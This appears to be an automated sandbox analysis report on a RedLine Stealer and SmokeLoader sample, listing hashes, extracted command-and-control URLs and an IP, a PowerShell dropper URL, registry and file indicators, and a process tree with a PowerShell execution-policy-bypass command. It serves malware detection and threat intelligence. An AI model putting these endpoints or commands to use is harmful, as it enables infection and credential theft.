redline | 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e

Analysis

max time kernel
150s
max time network
148s
platform
windows10_x64
resource
win10-en-20211208
submitted
10-12-2021 02:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
Size

218KB
MD5

26d0fb61e2a20ede3a49f4d6246b64cd
SHA1

eddaaa5c7dd217a818d57c216277cf081232dba6
SHA256

25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e
SHA512

f792ec1033410eaca68b3e882a54211f3a4d48b0416170b8a69dc0a22b970bef5e49879d4569a53c268609e5c8f433d80a47697828ce7f876e39e5837d90822a

Score

10^/10

redline smokeloader backdoor infostealer persistence suricata trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

rc4.i32

Extracted

Family

redline

195.133.47.114:38627

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\5679.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\5679.exe	family_redline
behavioral1/memory/4308-132-0x00000000011F0000-0x000000000125C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
96	224	powershell.exe
98	224	powershell.exe
99	224	powershell.exe
101	224	powershell.exe
103	224	powershell.exe
105	224	powershell.exe
107	224	powershell.exe
109	224	powershell.exe
111	224	powershell.exe

Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

5679.exe7A4D.exeC91A.exe

pid process

4384 5679.exe
4308 7A4D.exe
2136 C91A.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
4384	5679.exe
4308	7A4D.exe
2136	C91A.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

pid process

396
Loads dropped DLL 2 IoCs

Processes:

pid process

3040
3040
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

7A4D.exe

pid process

4308 7A4D.exe

pid	process
396

pid	process
3040
3040

pid	process
4308	7A4D.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C7C.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xrsqowxr.irz.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C5B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C6B.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mn10cpp0.m3m.psm1	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C3A.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C5A.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1992 reg.exe
Runs net.exe

pid	process
1992	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	98	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	99	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	101	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	103	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe

pid	process
3380	25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
3380	25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396
396

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

396
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

628
628
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe

pid process

3380 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe

pid	process
396

pid	process
628
628

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	396
Token: SeCreatePagefilePrivilege	396
Token: SeShutdownPrivilege	396
Token: SeCreatePagefilePrivilege	396
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeIncreaseQuotaPrivilege	4844	powershell.exe
Token: SeSecurityPrivilege	4844	powershell.exe
Token: SeTakeOwnershipPrivilege	4844	powershell.exe
Token: SeLoadDriverPrivilege	4844	powershell.exe
Token: SeSystemProfilePrivilege	4844	powershell.exe
Token: SeSystemtimePrivilege	4844	powershell.exe
Token: SeProfSingleProcessPrivilege	4844	powershell.exe
Token: SeIncBasePriorityPrivilege	4844	powershell.exe
Token: SeCreatePagefilePrivilege	4844	powershell.exe
Token: SeBackupPrivilege	4844	powershell.exe
Token: SeRestorePrivilege	4844	powershell.exe
Token: SeShutdownPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeSystemEnvironmentPrivilege	4844	powershell.exe
Token: SeRemoteShutdownPrivilege	4844	powershell.exe
Token: SeUndockPrivilege	4844	powershell.exe
Token: SeManageVolumePrivilege	4844	powershell.exe
Token: 33	4844	powershell.exe
Token: 34	4844	powershell.exe
Token: 35	4844	powershell.exe
Token: 36	4844	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeIncreaseQuotaPrivilege	5088	powershell.exe
Token: SeSecurityPrivilege	5088	powershell.exe
Token: SeTakeOwnershipPrivilege	5088	powershell.exe
Token: SeLoadDriverPrivilege	5088	powershell.exe
Token: SeSystemProfilePrivilege	5088	powershell.exe
Token: SeSystemtimePrivilege	5088	powershell.exe
Token: SeProfSingleProcessPrivilege	5088	powershell.exe
Token: SeIncBasePriorityPrivilege	5088	powershell.exe
Token: SeCreatePagefilePrivilege	5088	powershell.exe
Token: SeBackupPrivilege	5088	powershell.exe
Token: SeRestorePrivilege	5088	powershell.exe
Token: SeShutdownPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeSystemEnvironmentPrivilege	5088	powershell.exe
Token: SeRemoteShutdownPrivilege	5088	powershell.exe
Token: SeUndockPrivilege	5088	powershell.exe
Token: SeManageVolumePrivilege	5088	powershell.exe
Token: 33	5088	powershell.exe
Token: 34	5088	powershell.exe
Token: 35	5088	powershell.exe
Token: 36	5088	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeIncreaseQuotaPrivilege	2440	powershell.exe
Token: SeSecurityPrivilege	2440	powershell.exe
Token: SeTakeOwnershipPrivilege	2440	powershell.exe
Token: SeLoadDriverPrivilege	2440	powershell.exe
Token: SeSystemProfilePrivilege	2440	powershell.exe
Token: SeSystemtimePrivilege	2440	powershell.exe
Token: SeProfSingleProcessPrivilege	2440	powershell.exe
Token: SeIncBasePriorityPrivilege	2440	powershell.exe
Token: SeCreatePagefilePrivilege	2440	powershell.exe
Token: SeBackupPrivilege	2440	powershell.exe
Token: SeRestorePrivilege	2440	powershell.exe
Token: SeShutdownPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeSystemEnvironmentPrivilege	2440	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

396
396
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

396
396

pid	process
396
396

pid	process
396
396

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C91A.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 396 wrote to memory of 4384	396		5679.exe
PID 396 wrote to memory of 4384	396		5679.exe
PID 396 wrote to memory of 4384	396		5679.exe
PID 396 wrote to memory of 4308	396		7A4D.exe
PID 396 wrote to memory of 4308	396		7A4D.exe
PID 396 wrote to memory of 4308	396		7A4D.exe
PID 396 wrote to memory of 2136	396		C91A.exe
PID 396 wrote to memory of 2136	396		C91A.exe
PID 2136 wrote to memory of 1504	2136	C91A.exe	powershell.exe
PID 2136 wrote to memory of 1504	2136	C91A.exe	powershell.exe
PID 1504 wrote to memory of 2708	1504	powershell.exe	csc.exe
PID 1504 wrote to memory of 2708	1504	powershell.exe	csc.exe
PID 2708 wrote to memory of 2760	2708	csc.exe	cvtres.exe
PID 2708 wrote to memory of 2760	2708	csc.exe	cvtres.exe
PID 1504 wrote to memory of 3580	1504	powershell.exe	csc.exe
PID 1504 wrote to memory of 3580	1504	powershell.exe	csc.exe
PID 3580 wrote to memory of 3140	3580	csc.exe	cvtres.exe
PID 3580 wrote to memory of 3140	3580	csc.exe	cvtres.exe
PID 1504 wrote to memory of 4844	1504	powershell.exe	powershell.exe
PID 1504 wrote to memory of 4844	1504	powershell.exe	powershell.exe
PID 1504 wrote to memory of 5088	1504	powershell.exe	powershell.exe
PID 1504 wrote to memory of 5088	1504	powershell.exe	powershell.exe
PID 1504 wrote to memory of 2440	1504	powershell.exe	powershell.exe
PID 1504 wrote to memory of 2440	1504	powershell.exe	powershell.exe
PID 1504 wrote to memory of 2984	1504	powershell.exe	reg.exe
PID 1504 wrote to memory of 2984	1504	powershell.exe	reg.exe
PID 1504 wrote to memory of 1992	1504	powershell.exe	reg.exe
PID 1504 wrote to memory of 1992	1504	powershell.exe	reg.exe
PID 1504 wrote to memory of 3712	1504	powershell.exe	reg.exe
PID 1504 wrote to memory of 3712	1504	powershell.exe	reg.exe
PID 1504 wrote to memory of 2820	1504	powershell.exe	net.exe
PID 1504 wrote to memory of 2820	1504	powershell.exe	net.exe
PID 2820 wrote to memory of 3440	2820	net.exe	net1.exe
PID 2820 wrote to memory of 3440	2820	net.exe	net1.exe
PID 1504 wrote to memory of 3204	1504	powershell.exe	cmd.exe
PID 1504 wrote to memory of 3204	1504	powershell.exe	cmd.exe
PID 3204 wrote to memory of 1180	3204	cmd.exe	cmd.exe
PID 3204 wrote to memory of 1180	3204	cmd.exe	cmd.exe
PID 1180 wrote to memory of 4316	1180	cmd.exe	net.exe
PID 1180 wrote to memory of 4316	1180	cmd.exe	net.exe
PID 4316 wrote to memory of 4260	4316	net.exe	net1.exe
PID 4316 wrote to memory of 4260	4316	net.exe	net1.exe
PID 1504 wrote to memory of 4232	1504	powershell.exe	cmd.exe
PID 1504 wrote to memory of 4232	1504	powershell.exe	cmd.exe
PID 4232 wrote to memory of 4280	4232	cmd.exe	cmd.exe
PID 4232 wrote to memory of 4280	4232	cmd.exe	cmd.exe
PID 4280 wrote to memory of 4428	4280	cmd.exe	net.exe
PID 4280 wrote to memory of 4428	4280	cmd.exe	net.exe
PID 4428 wrote to memory of 4404	4428	net.exe	net1.exe
PID 4428 wrote to memory of 4404	4428	net.exe	net1.exe
PID 580 wrote to memory of 3312	580	cmd.exe	net.exe
PID 580 wrote to memory of 3312	580	cmd.exe	net.exe
PID 3312 wrote to memory of 3808	3312	net.exe	net1.exe
PID 3312 wrote to memory of 3808	3312	net.exe	net1.exe
PID 4272 wrote to memory of 408	4272	cmd.exe	net.exe
PID 4272 wrote to memory of 408	4272	cmd.exe	net.exe
PID 408 wrote to memory of 1500	408	net.exe	net1.exe
PID 408 wrote to memory of 1500	408	net.exe	net1.exe
PID 1820 wrote to memory of 2480	1820	cmd.exe	net.exe
PID 1820 wrote to memory of 2480	1820	cmd.exe	net.exe
PID 2480 wrote to memory of 2656	2480	net.exe	net1.exe
PID 2480 wrote to memory of 2656	2480	net.exe	net1.exe
PID 2776 wrote to memory of 2688	2776	cmd.exe	net.exe
PID 2776 wrote to memory of 2688	2776	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
"C:\Users\Admin\AppData\Local\Temp\25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3380

C:\Users\Admin\AppData\Local\Temp\5679.exe
C:\Users\Admin\AppData\Local\Temp\5679.exe
1⤵
- Executes dropped EXE
PID:4384

C:\Users\Admin\AppData\Local\Temp\7A4D.exe
C:\Users\Admin\AppData\Local\Temp\7A4D.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4308

C:\Users\Admin\AppData\Local\Temp\C91A.exe
C:\Users\Admin\AppData\Local\Temp\C91A.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lr4k5ras\lr4k5ras.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDED3.tmp" "c:\Users\Admin\AppData\Local\Temp\lr4k5ras\CSC5C40ACA4BE2147D9BD68D9DAF850F52C.TMP"
4⤵
PID:2760

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xqe10l4e\xqe10l4e.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3F3.tmp" "c:\Users\Admin\AppData\Local\Temp\xqe10l4e\CSC3BEEE61E154A1387A84C6526928EB.TMP"
4⤵
PID:3140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
